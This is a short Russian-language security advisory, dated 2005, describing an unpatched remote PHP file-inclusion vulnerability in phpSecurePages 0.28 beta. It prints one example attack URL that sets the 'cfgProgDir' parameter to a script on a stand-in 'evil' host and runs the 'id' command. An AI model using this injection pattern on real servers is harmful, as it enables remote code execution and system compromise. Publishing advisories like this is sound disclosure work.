PHP-инклюдинг в phpSecurePages

Дата публикации:08.07.2005
Всего просмотров:6007
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: phpSecurePages 0.x
Уязвимые версии: phpSecurePages 0.28 beta

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре 'cfgProgDir' файла 'secure.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/phpSecurePages /secure.php?&
cfgProgDir=http://evil/cmd.txt?&cmd=id

URL производителя: www.phpsecurepages.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpSecurePages Remote File Include